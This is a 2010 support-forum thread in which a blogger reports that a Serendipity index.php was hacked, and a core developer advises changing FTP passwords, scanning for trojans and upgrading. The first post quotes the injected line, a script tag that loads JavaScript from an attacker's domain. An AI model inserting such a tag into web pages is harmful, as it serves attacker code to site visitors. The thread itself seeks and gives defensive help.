Dear All,
Correction! Not .tpl, .php
during the last two days, my index.php file has been hacked, I believe not within my ftp account, by a foraiegn website, addig a code as follows:
<script type="text/javascript" src="http://iopap.upperdarby26.com/Kerning.js"></script>
The day before yesterday, it was quite the same, just with another code. Both codes have not been just added, but detryoyed the complete performance of my website. I reloaded my safety copy, so nothing can be seen on my website now.
I run rel. 1.4.1 and updated to 1.5 after the second attack.
Has anyone experienced something similar? And how can I protect this file from beeing re-written?
Best wishes from Hungary and thanks for your answers in advance.
Sehpferd
Hacked index.php
Hacked index.php
Last edited by sehpferd on Tue Jun 22, 2010 2:08 pm, edited 1 time in total.
Re: Hacked index.tpl
To which version exactly did you upgrade? Did you change all your passwords? Had a look for other modified or added files?
-
garvinhicking
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
Re: Hacked index.tpl
Hi!
You definitely need to at least change your FTP account password! That is most probable the way the hackers change your index.php.
Also, definitely scan your computer (NOT the server) for viri and trojaners. You might have a password sniffer on your computer.
Regards,
Garvin
You definitely need to at least change your FTP account password! That is most probable the way the hackers change your index.php.
Also, definitely scan your computer (NOT the server) for viri and trojaners. You might have a password sniffer on your computer.
Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
Re: Hacked index.php
@ Garvin:
Thanks very much fo the hint, but it is very, very unlikely that some is interested to put an advertisement on my website that will destroy the complete code - that makes no sense. It seems to me that index.php has been hacked automatically by a robot, and if it is possible to destryo my blog, othre blogs my well be affected as well.
Of course I check for Trojans and such things every day, so I do not really believe it is my fault or caused by my computer. I ran serendipity 1.4.1 when it happened and now I'm running 1.5.3, by the way and I use the Plus9 template.
So are there any other suggestions?
Best wishes
Gebhard
Thanks very much fo the hint, but it is very, very unlikely that some is interested to put an advertisement on my website that will destroy the complete code - that makes no sense. It seems to me that index.php has been hacked automatically by a robot, and if it is possible to destryo my blog, othre blogs my well be affected as well.
Of course I check for Trojans and such things every day, so I do not really believe it is my fault or caused by my computer. I ran serendipity 1.4.1 when it happened and now I'm running 1.5.3, by the way and I use the Plus9 template.
So are there any other suggestions?
Best wishes
Gebhard
-
garvinhicking
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
Re: Hacked index.php
Hi!
Yes, I of course also meant it was automatted through those trojans use any FTP account they can find, search for any index.php they can find, and insert their malware.
Serendipity 1.4.1 could be used as an attack vector, which is why after the upgrade you must change your passwords because otherwise, the current access might still be used.
Regards,
Garvin
Yes, I of course also meant it was automatted through those trojans use any FTP account they can find, search for any index.php they can find, and insert their malware.
Serendipity 1.4.1 could be used as an attack vector, which is why after the upgrade you must change your passwords because otherwise, the current access might still be used.
Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/